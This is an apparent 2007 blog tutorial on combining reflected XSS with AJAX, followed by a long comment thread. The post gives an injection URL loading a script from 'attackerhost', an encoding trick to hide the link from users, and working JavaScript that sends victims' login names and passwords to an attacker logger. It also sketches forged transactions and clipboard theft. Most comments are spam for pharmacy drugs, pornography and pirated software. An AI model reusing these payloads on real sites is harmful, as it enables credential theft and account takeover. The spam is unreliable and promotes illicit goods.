Welcome to BARMAGY Sign in | Join | Help

The Dark Side of AJAX

Hello guys,

Today we are going to talk about a very interesting topic. As we are all now are accustomed with ajax and it’s new programming techniques I want you to imagine this, imagine if the ajax techniques have been combined with the common old hacking techniques, what are we going to get?

For example we have talked before about XSS vulnerabilities and how they work so imagine this that if we used ajax to exploit an XSS vulnerability that does exist in some web application, what can we get?

Say we have a web application that is vulnerable to XSS in its login page that looks like this

<html>

<body>

<form method="post" action="login.php">

User:<input type="text" name="user"><br>

Pass:<input type="password" name="pass"><br>

<input type="Submit" value="login">

</form>

</body>

</html>

<?

//some code to do the authentication then sets our $authenticated flag

if(!$authenticated)

die("Sorry the user $user doesn't exist in our database or the password is not correct");

//rest of code

?>

As we can see here we have an obvious XSS vulnerability here in the die() function where it prints out the user name directly without any filtration before outputting it to the user. So we can simply attack the users of this page by sending this url

http://host/login.php?user=<script%20src=http://attackerhost/attackscript.js></script>

Where attackscript.js is a script on the attacker host that will contain his really big attack script that is using ajax techniques. I’ve ignored using quotations deliberately to bypass the magic quotes protection from XSS that PHP have.

Also to make harder to detect by experienced users we can encode this url so it can look like this

http://host/login.php?user=%3Cscript%20src%3Dhttp%3A//attackerhost/attackscript.js%3E%3C/script%3E

 

You can use this java script to encode yours

 

<html>

<body>

<input id="in" type="text">

<input id="out" type="text">

<input type="submit" value="encode" onclick="encode()">

</body>

</html>

<script>

function encode()

{

document.getElementById("out").value = escape(document.getElementById("in").value)

}

</script>

 

So now let’s move to the ajax part, I’ve already managed to load my big java script file into the browser of my victim so what’s next? Why use ajax?

Well, this is a good question indeed, as one of the most famous features of ajax that it runs asynchronously which means from the hacker aspect being undetectable by the user, the second most famous feature is that ajax can make server side calls with the XMLHttpRequest object and this means from the hacker aspect the ability to do actions like logging the user sensitive data without the user being aware of it or submitting server side requests on behalf of the user while using the user credentials and in the same time without any intrusion detection tool (like a firewall for example) can stop him/here as the attacker can send these data tunneled in HTTP requests on a port that is already opened by the user and with an application that is approved by the user to run and connect to the internet which is this case is the user web browser.

So say that we used this code in our attack script

 

//this is function which will be called when the user clicks the login button

document.getElementsByTagName("input")[2].onclick = function logdata()

{

  //here we create our XMLHttpRequest object

  xmlHttp=GetXmlHttpObject()

  //and here we create our request string to the attacker host logger script

  //sending it the user name and password of the attacked victim

  var url="http://attackerhost/logger.php?user=" + document.getElementsByName("user")[0].value + "&pass=" + document.getElementsByName("pass")[0].value

  xmlHttp.open("GET",url,true)

  xmlHttp.send(null)

 

}

//the rest of this code is the code that is responsible of creating

//the XMLHttpRequest object for different browsers

function GetXmlHttpObject()

{

  var xmlHttp=null;

  try

    {

    // Firefox, Opera 8.0+, Safari

    xmlHttp=new XMLHttpRequest();

    }

  catch (e)

    {

    // Internet Explorer

    try

      {

      xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");

      }

    catch (e)

      {

      xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");

      }

    }

  return xmlHttp;

}

 

So now when ever a user clicks the login button the ajax method logdata() will be invoked to send the user name and password to the attacker logging script then redirect the user normally to the next page without any suspicious actions that can alarm the user and force him/her to change his/her password immediately.

Other things can be also done in other scenarios for example if the XSS vulnerability does exist in any other page where the user can access only when s/he is authenticated then an attacker can change the request url in his/here attack script to request any other authenticated page and submit any action with the credentials of the victim user say for example to make a bank transaction to the attacker account or send by mail the exploit url to all of the victim user contact list on that web application. Also the attacker can read the clipboard of the victim user while the user is still having the vulnerable page open and then send the clipboard content to his/her logger script every 5 seconds for example (that only can happen if the browser doesn’t warn the user about this page is trying to access his clipboard).

I hope you liked this article and I would appreciate any feedback or comments, if you have any question you can submit it here in a comment and I will answer it later once I’ve time

Thanks for reading

 

Published Friday, July 13, 2007 10:31 PM by Fady

Comment Notification

If you would like to receive an email when updates are made to this post, please register here

Subscribe to this post's comments using RSS

Comments

# re: The Dark Side of AJAX

nice article ya fadi bgd enta 7'sara fe el bald de:D
Friday, July 13, 2007 10:42 PM by Nehal

# re: The Dark Side of AJAX

Nice Post
Friday, July 13, 2007 11:53 PM by Ahmed

# re: The Dark Side of AJAX

Thanks guys really for your support
@Nehal
LOL mashy ya sety :P
Saturday, July 14, 2007 12:04 AM by Fady

# Seth&#8217;s bl0g &raquo; [White Paper] - Ajax ed XSS

Saturday, July 14, 2007 9:43 PM by Seth’s bl0g » [White Paper] - Ajax ed XSS

# re: The Dark Side of AJAX

sending the user and pass to a remote host like that won't work. Ajax is subject to the same-domain policy. The attacker will only be able to send packages to the domain in question.
Sunday, July 15, 2007 11:17 AM by para

# re: The Dark Side of AJAX

yes actually this is the case with browsers that doesn't allow cross-dmain scripting for security like firefox but it's working normally with IE7, for sorry currently i don't have time to test it with other browsers, when i test it i will get back to you with the results
but anyway if cross-domain scripting is disabled that won't prevent the attacker from making web requests on behalf of the user in the same site which means the attacker can do any actions that is allowed within the web application with the same user privilages
Sunday, July 15, 2007 6:10 PM by Fady

# Anti XSS AJAX


XSS have became a problem that most web developers still suffering from it tell now, simply because...
Friday, July 20, 2007 2:59 AM by Infinite Loop

# re: The Dark Side of AJAX

How do you sanitize the output in order to prevent XSS?
Friday, July 20, 2007 5:07 PM by d4rw1n

# re: The Dark Side of AJAX

you should alway filter the user input for <script> tags and convert them to browser friendly characters
for example < would be &lt; and > would &gt;
Saturday, July 21, 2007 12:32 AM by Fady

# re: The Dark Side of AJAX

Well, its no big news that authorization should not be done on the client side.
the server should verify that the user is authenticated and authorized before it serve any request.
Monday, July 23, 2007 12:10 PM by Omry

# re: The Dark Side of AJAX

i think you have missed the main point, even if the user is authenticated and authorized XSS vulnerabilities may exist and this attack technique may be implemented. in fact the user being authenticated while this attack may pose more danger on him/her
i think you should read more about XSS
Tuesday, July 24, 2007 4:05 PM by Fady

# ZULL TEST &raquo; ???????????? &raquo; ?????? ajax ???????? ?????????? ???????

# re: The Dark Side of AJAX

Thursday, November 22, 2007 3:52 PM by myspace

# re: The Dark Side of AJAX

Good Site! Thanks!
<a href= http://***-***-shot.evilauto.info/index.html > *** *** shot </a>
<a href= http://britneys-***.evilauto.info/index.html > britneys *** </a>
<a href= http://red-head-***.evilauto.info/index.html > red head *** </a>
Wednesday, December 12, 2007 8:03 AM by ertPiginapoke

# re: The Dark Side of AJAX

SQOkEw  <a href="http://ovymktmckhsh.com/">ovymktmckhsh</a>, [url=http://thqoakqdsfvj.com/]thqoakqdsfvj[/url], [link=http://axahrfychzqr.com/]axahrfychzqr[/link], http://iefnpqwuwxja.com/
Friday, March 21, 2008 4:44 PM by rybgoojslcx

# re: The Dark Side of AJAX

Hi Fady, great post, at the beginning I hadn't notice that it’s your post but after I checked a PingBack from http://www.0xseth.com/bl0g/?p=182 Where I saw your name and knew that it’s you, well done ya man, keep the good work
Friday, May 30, 2008 7:42 PM by wdeveloper

# антимаулнетизм ветерком

с антимаулнетизм <a href= http://antiprivichka.ru >антимаулнетизм ветерком</a> [url=http://antiprivichka.ru]антимаулнетизм ветерком[/url]
Saturday, June 21, 2008 1:27 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# membership vicodin

vicodin tablets <a href= http://vinography.com/images/archives/vicodin.html >membership vicodin</a> [url=http://vinography.com/images/archives/vicodin.html]membership vicodin[/url]
Saturday, June 21, 2008 3:59 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# пунктуально антимаулнетизм

отлично антимаулнетизм <a href= http://faa.appstate.edu/photo/111.html >пунктуально антимаулнетизм</a> [url=http://faa.appstate.edu/photo/111.html]пунктуально антимаулнетизм[/url]
Sunday, June 22, 2008 2:06 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# swingers in opera virginia

in swingers virginia country <a href= http://bezodoka.cn/swingers-in-virginia.html >swingers in opera virginia</a> [url=http://bezodoka.cn/swingers-in-virginia.html]swingers in opera virginia[/url]
Monday, June 30, 2008 7:23 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# ebony xxx candy pic

hoes pic xxx ebony <a href= http://cinobaro.cn/ebony-xxx-pic.html >ebony xxx candy pic</a> [url=http://cinobaro.cn/ebony-xxx-pic.html]ebony xxx candy pic[/url]
Wednesday, July 09, 2008 4:41 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# sale lamisil

Sunday, July 20, 2008 8:22 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# cream lamisil

Tuesday, July 22, 2008 2:14 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# cream lamisil

Tuesday, July 22, 2008 2:14 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# problem fibroid

Tuesday, August 05, 2008 5:31 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# *** cancer radiation treatment

treatment *** for cancer <a href= http://forums.invisionpower.com/index.php?showuser=134722 >*** cancer radiation treatment</a> [url=http://forums.invisionpower.com/index.php?showuser=134722]*** cancer radiation treatment[/url]
Wednesday, August 06, 2008 1:31 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# Cheap viagra

Monday, August 25, 2008 4:06 AM by Pharm35

# Cheap viagra

Very nice site!
Monday, August 25, 2008 4:06 AM by Pharm17

# Cheap viagra

Monday, August 25, 2008 4:07 AM by Pharm55

# Cheap viagra

Very nice site!
Monday, August 25, 2008 4:07 AM by Pharm41

# still *** dates

dates *** how <a href= http://rollyo.com/***-dates >still *** dates</a> [url=http://rollyo.com/***-dates]still *** dates[/url]
Monday, August 25, 2008 4:10 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# hentai huge ***

hentai jugs huge <a href= http://rollyo.com/hentai-huge >hentai huge ***</a> [url=http://rollyo.com/hentai-huge]hentai huge ***[/url]
Thursday, September 04, 2008 10:47 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# super maria hentai

hentai maria mario <a href= http://rollyo.com/hentai-maria >super maria hentai</a> [url=http://rollyo.com/hentai-maria]super maria hentai[/url]
Friday, September 05, 2008 9:51 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# ogure zip hentai son

ogre ogure hentai zip <a href= http://rollyo.com/hentai-zip-ogure >ogure zip hentai son</a> [url=http://rollyo.com/hentai-zip-ogure]ogure zip hentai son[/url]
Sunday, September 07, 2008 11:57 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# ebook success adsense

the adsense ebook <a href= http://lucy43.vidilife.com >ebook success adsense</a> [url=http://lucy43.vidilife.com]ebook success adsense[/url]
Tuesday, September 16, 2008 7:13 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# computer Corel Snapfire Plus 1.0 for $14.95

[URL=http://syscommusa.com/info-Corel_Snapfire_Plus_1.0.html]download Corel Snapfire Plus 1.0[/URL]
Sunday, September 21, 2008 9:14 PM by usacomm

# principal numerology

principal activities <a href= http://regencylakeland.cn/principal-medical-insurance.html >principal numerology</a> [url=http://regencylakeland.cn/principal-medical-insurance.html]principal numerology[/url]
Saturday, October 11, 2008 11:21 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# insurance ar health led leads

leads cards insurance health ar <a href= http://1k.pl/fdntpe >insurance ar health led leads</a> [url=http://1k.pl/fdntpe]insurance ar health led leads[/url]
Wednesday, October 15, 2008 10:04 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# career gardening method in solving health problem

in health method skills problem solving career <a href= http://1k.pl/swktxy >career gardening method in solving health problem</a> [url=http://1k.pl/swktxy]career gardening method in solving health problem[/url]
Thursday, October 16, 2008 6:44 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# ohio for health conditions insurance preexisting medical

magazine for conditions ohio insurance health preexisting <a href= http://1k.pl/kxxbwp >ohio for health conditions insurance preexisting medical</a> [url=http://1k.pl/kxxbwp]ohio for health conditions insurance preexisting medical[/url]
Thursday, October 16, 2008 11:27 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# term short gum insurance health guam

term history insurance short guam health <a href= http://www.clubplanet.com/brayden8451 >term short gum insurance health guam</a> [url=http://www.clubplanet.com/brayden8451]term short gum insurance health guam[/url]
Friday, October 17, 2008 1:24 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# terrorism counter degree calorie masters

degree counter masters terrorism geiger <a href= http://www.videocodezone.com/users/leah8557 >terrorism counter degree calorie masters</a> [url=http://www.videocodezone.com/users/leah8557]terrorism counter degree calorie masters[/url]
Tuesday, October 21, 2008 2:09 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# sandals scandal school oprah

sandals scandal school oprah <a href= http://www.videocodezone.com/users/icholas7076 >sandals scandal school oprah</a> [url=http://www.videocodezone.com/users/icholas7076]sandals scandal school oprah[/url]
Tuesday, October 21, 2008 2:50 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# pros cons of school prayer roses in and

school serenity and prayer of pros cons in <a href= http://www.videocodezone.com/users/emily7075 >pros cons of school prayer roses in and</a> [url=http://www.videocodezone.com/users/emily7075]pros cons of school prayer roses in and[/url]
Wednesday, October 22, 2008 3:12 AM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# re: The Dark Side of AJAX

wphJMR hi webmastters
Thursday, October 23, 2008 6:48 PM by john2025

# chicago college westwood

westwood college at <a href= http://www.jambase.com/Fans/xavier7717 >chicago college westwood</a> [url=http://www.jambase.com/Fans/xavier7717]chicago college westwood[/url]
Thursday, October 23, 2008 10:09 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# online propane auto insurance gmac

gmac insurance biography auto online <a href= http://1k.pl/lpwlk >online propane auto insurance gmac</a> [url=http://1k.pl/lpwlk]online propane auto insurance gmac[/url]
Sunday, October 26, 2008 2:51 PM by ctl00$_$ctl00$_$ctl01$_$form$_$tbname

# guru post

Hi, I think that you is overdid. To look to bredshika, please.
<a href=" http://medspills.110mb.com ">glucophage and weight lose</a>
Monday, November 03, 2008 11:03 PM by Ron

# computer Adobe Acrobat Distiller 6 for $99,95

[URL=http://cheapdownload.org/info-Adobe_Acrobat_Distiller_6.html]purchase Adobe
Acrobat Distiller 6 software[/URL]
Friday, November 07, 2008 1:49 PM by Lapsiks

# re: The Dark Side of AJAX

sLtGxq hi mebmasters
Monday, November 10, 2008 6:51 PM by mebmasters

# re: The Dark Side of AJAX

hi webmasters good
Tuesday, November 11, 2008 7:28 PM by viagra

# re: The Dark Side of AJAX

hi webmasters good
Tuesday, November 11, 2008 8:05 PM by propecia

# re: The Dark Side of AJAX

hi webmasters good
Tuesday, November 11, 2008 8:39 PM by levitra

# re: The Dark Side of AJAX

hi webmasters good
Tuesday, November 11, 2008 9:14 PM by cialis

# re: The Dark Side of AJAX

hi webmasters good
Tuesday, November 11, 2008 9:51 PM by propecia

# re: The Dark Side of AJAX

hi webmasters good
Tuesday, November 11, 2008 10:28 PM by cialis

# re: The Dark Side of AJAX

hi webmasters good
Tuesday, November 11, 2008 10:58 PM by levitra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 12:06 AM by viagra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 12:41 AM by viagra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 1:15 AM by viagra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 1:50 AM by viagra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 2:26 AM by viagra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 3:01 AM by viagra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 3:36 AM by viagra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 4:10 AM by cialis

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 4:44 AM by cialis

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 5:20 AM by cialis

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 5:55 AM by cialis

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 6:28 AM by cialis

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 7:04 AM by cialis

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 7:40 AM by levitra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 8:15 AM by levitra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 8:50 AM by levitra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 9:28 AM by levitra

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 10:03 AM by teeth whitening

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 10:40 AM by teeth whitening

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 11:15 AM by teeth whitening

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 11:51 AM by teeth whitening

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 12:28 PM by teeth whitening

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 1:03 PM by teeth whitening

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 1:38 PM by teeth whitening

# re: The Dark Side of AJAX

hi webmasters good
Wednesday, November 12, 2008 2:17 PM by ecstacy

# Faraacuctda darmnardianny

snongomourn [url=http://google.com]google[/url]
axoftonnony mumnFanoinsix http://google.com
Sunday, November 23, 2008 1:31 AM by erarberce

# Nero 6 Ultra Edition software for $29.95

[URL=http://oemstore.biz/info-Nero_6_Ultra_Edition.html]downloadable online Nero 6 Ultra Edition software[/URL]
Saturday, December 06, 2008 4:44 PM by MadMark

# cd shop Steinberg WaveLab 5.01b software for $49.95

[URL=http://downloads-cheap.com/info-Steinberg_WaveLab_5.01b.html]cd shop Steinberg WaveLab 5.01b software[/URL]
Wednesday, December 10, 2008 5:56 PM by MarioKnesser

# buy Adobe Photoshop CS2 + Image ready CS2 software for $99,95

[URL=http://whitebearsales.com/info-Adobe_Photoshop_CS2___Image_ready_CS2.html]Adobe Photoshop CS2 + Image ready CS2[/URL]
Monday, December 15, 2008 4:15 PM by Limpopopop

# Cheap viagra

Wednesday, January 28, 2009 7:43 AM by Pharm29

# Cheap viagra

Very nice site!
Wednesday, January 28, 2009 7:43 AM by Pharm16

# Cheap viagra

Wednesday, January 28, 2009 7:44 AM by Pharm23

# Cheap viagra

Very nice site!
Wednesday, January 28, 2009 7:44 AM by Pharm58

# online Adobe Acrobat 7 MAC for $59.96

[URL=http://cheapoemstore.com/info-Adobe_Acrobat_7_MAC.html]downloadable Adobe Acrobat 7 MAC software[/URL]
Thursday, January 29, 2009 10:05 AM by JulietOreira

# cd full retail Corel Photo Painter 8 for $39.95

[URL=http://cheap-adobe.com/info-Corel_Photo_Painter_8.html]oem Corel Photo Painter 8 software[/URL]
Sunday, February 01, 2009 4:28 PM by ARossi

# Macromedia Fireworks 8 software for $39.95

Monday, February 02, 2009 11:39 PM by KukkoDrukko

# where to buy online CorelDRAW Graphics Suite 12 software for $69.95

[URL=http://cheapsoftwareoem.com/info-CorelDRAW_Graphics_Suite_12.html]buy online CorelDRAW Graphics Suite 12[/URL]
Wednesday, February 04, 2009 12:44 PM by JudithPerry

# purchase full version Adobe Illustrator CS software for $59.95

Thursday, February 26, 2009 8:54 PM by JudithPerry

# Symantec Norton Antivirus 2005 for $29.95

[URL=http://cheapoemstore.com/info-Symantec_Norton_Antivirus_2005.html]Symantec Norton Antivirus 2005[/URL]
Sunday, March 01, 2009 10:30 PM by JulietOreira

# Microsoft Office 2003 Professional Edition software for $59.95

[URL=http://softwarebusiness.biz/info-Microsoft_Office_2003_Professional_Edition.html]Microsoft Office 2003 Professional Edition[/URL]
Saturday, March 14, 2009 2:30 AM by PaulSmith

# downloadable Macromedia RoboHelp X5 software for $99.95

Sunday, March 29, 2009 2:07 PM by JudithPerry

# online Cakewalk Sonar 4 Producer Edition for $59.95

[URL=http://cheapsoftwareoem.com/info-Cakewalk_Sonar_4_Producer_Edition.html]download computer Cakewalk Sonar 4 Producer Edition[/URL]
Monday, March 30, 2009 12:31 AM by JudithPerry

# online Steinberg Halion 3.1 for $14.95

[URL=http://photoshopcheap.com/info-">http://photoshopcheap.com/info-
Steinberg_Halion_3.1.html]box oem Steinberg Halion 3.1 software[/URL]

[url=http://photoshopcheap.com]oem photoshop[/url]
Monday, March 30, 2009 11:39 PM by ElizeSommer

# full version Macromedia Director MX v10.0 software for $49.95

[URL=http://cheapsoftwareoem.com/info-Macromedia_Director_MX_v10.0.html]online Macromedia Director MX v10.0 software[/URL]
Wednesday, April 01, 2009 12:21 PM by JudithPerry

# windows xp pro cheap

Thursday, April 02, 2009 11:26 PM by Ambrakam

# cheap xp

Sunday, April 12, 2009 9:34 AM by Ambrakam

# Adobe Premiere PRO 2.0 for $110

[URL=http://photoshopcheap.com/info-Adobe_Premiere_PRO_2.0.html">http://photoshopcheap.com/info-Adobe_Premiere_PRO_2.0.html]purchase retail Adobe Premiere PRO 2.0 software[/URL]

[url=http://photoshopcheap.com]oem photoshop[/url]
Friday, April 17, 2009 1:16 AM by ElizeSommer

# where to buy online CorelDRAW Graphics Suite 12 software for $69.95

[URL=http://photoshopcheap.com/info-CorelDRAW_G">http://photoshopcheap.com/info-CorelDRAW_G
raphics_Suite_12.html]buy online CorelDRAW Graphics Suite 12[/URL]

[url=http://photoshopcheap.com]cheap software[/url]
Friday, April 17, 2009 2:05 PM by ElizeSommer

# online Steinberg Halion 3.1 for $14.95

[URL=http://photoshopcheap.com/info-">http://photoshopcheap.com/info-
Steinberg_Halion_3.1.html]box oem Steinberg Halion 3.1 software[/URL]

[url=http://photoshopcheap.com]oem software[/url]
Saturday, April 18, 2009 4:55 PM by ElizeSommer

# AutoCAD 2005 software for $59.95

[URL=http://software-oem.net/info-AutoCAD_2005.html">http://software-oem.net/info-AutoCAD_2005.html]AutoCAD 2005[/URL]

[url=http://software-oem.net]oem software[/url]
Sunday, April 19, 2009 8:03 AM by KukkoDrukko

# imposed human store positive

gases cover amount nations thousand methane
Monday, April 20, 2009 11:48 PM by darlinahat

# oem cd Adobe Creative Suite 2 Premium for $229.95

[URL=http://software-oem.net/info-Adobe_Creative_Suite_2_Premium.html">http://software-oem.net/info-Adobe_Creative_Suite_2_Premium.html]purchase Adobe Creative Suite 2 Premium[/URL]

[url=http://software-oem.net]software oem[/url]
Tuesday, April 21, 2009 9:58 AM by KukkoDrukko

# Jay Sean - Ride it (radio edit)

[URL=http://downloadmp3-music.com/artist-jay-sean/album-ride-it-353462/]Jay Sean - Ride it (radio edit)[/URL]
Wednesday, April 22, 2009 12:09 AM by GenrieAB

# Teddy Douglas - Whatcha Gonna Do (Unreleased instrumental mix)

[URL=http://downloadmp3-music.com/artist-teddy-douglas/album-whatcha-gonna-do-331808/]Teddy Douglas - Whatcha Gonna Do (Unreleased instrumental mix)[/URL]
Thursday, April 23, 2009 8:28 AM by GenrieAB

# Britney Spears - Piece of Me (Bimbo Jones radio edit)

[URL=http://downloadtopmp3.com/artist-britney-spears/album-piece-of-me-354090/]Britney Spears - Piece of Me (Bimbo Jones radio edit)[/URL]
Thursday, April 23, 2009 6:55 PM by CharlesRob

# Dire Straits - Why Aye Man

Saturday, April 25, 2009 12:32 AM by GenrieAB

# Maor Levi - Shapes (Original mix)

[URL=http://downloadmp
3-music.com/artist-maor-levi-58935-1/]Maor Levi - Shapes (Original mix)[/URL]
Monday, April 27, 2009 1:29 AM by GenrieAB

# Robert Wyatt - Comicopera

[URL=http://downloadmp3-music.com/artist-robert-wyatt-133910-1/]Robert Wyatt - Comicopera[/URL]
Monday, April 27, 2009 11:39 PM by GenrieAB

# Place Vendome - Streets Of Fire

[URL=http://topmp3chart.com/album2407713/place-vendome/streets-of-fire/]Place Vendome - Streets Of Fire[/URL]
Wednesday, April 29, 2009 9:42 PM by AvalonMr

# Architects - Hollow Crown

[URL=http://topmp3chart.com/artist422083/architects/]Architects - Hollow Crown[/URL]
Thursday, April 30, 2009 11:35 PM by AvalonMr

# Scorpions - Taken B-Side Disc 2

[URL=http://topmp3chart.com/artist125920/scorpions/]Scorpions - Taken B-Side Disc 2[/URL]
Friday, May 08, 2009 4:57 PM by AvalonMr

# map 8

Monday, May 18, 2009 8:54 AM by Dryshjj

# cheap Glucotrol xl online

Thursday, June 11, 2009 12:44 PM by VivianG

# cheapest price Zovirax no prescription

cheapest price Zovirax no prescription[URL=http://reducedratepharmacy.com//index.php?product=zovirax&lang=en-us]cheap Zovirax[/URL]
Thursday, July 23, 2009 3:40 PM by ReggieRed

# Cheap viagra

Very nice site!
Tuesday, January 19, 2010 6:02 PM by Pharmd494

# Cheap viagra

Very nice site!
Thursday, January 28, 2010 2:22 AM by Pharme585

# Good info

Hello! fbecedc interesting fbecedc site!
Wednesday, February 24, 2010 1:59 PM by Pharmd441

# Good info

Very nice site! <a href="http://oieypxa.com/oryraar/1.html">cheap viagra</a>
Wednesday, February 24, 2010 1:59 PM by Pharmd101

# Good info

Very nice site!  [url=http://oieypxa.com/oryraar/2.html]cheap cialis[/url]
Wednesday, February 24, 2010 1:59 PM by Pharme991

# Good info

Very nice site! cheap cialis http://oieypxa.com/oryraar/4.html
Wednesday, February 24, 2010 1:59 PM by Pharmd14

# Good info

Very nice site!
Wednesday, February 24, 2010 2:00 PM by Pharmk90

# gregory

Thursday, March 04, 2010 8:26 PM by gregory

What do you think?

(required) 
required 
(required)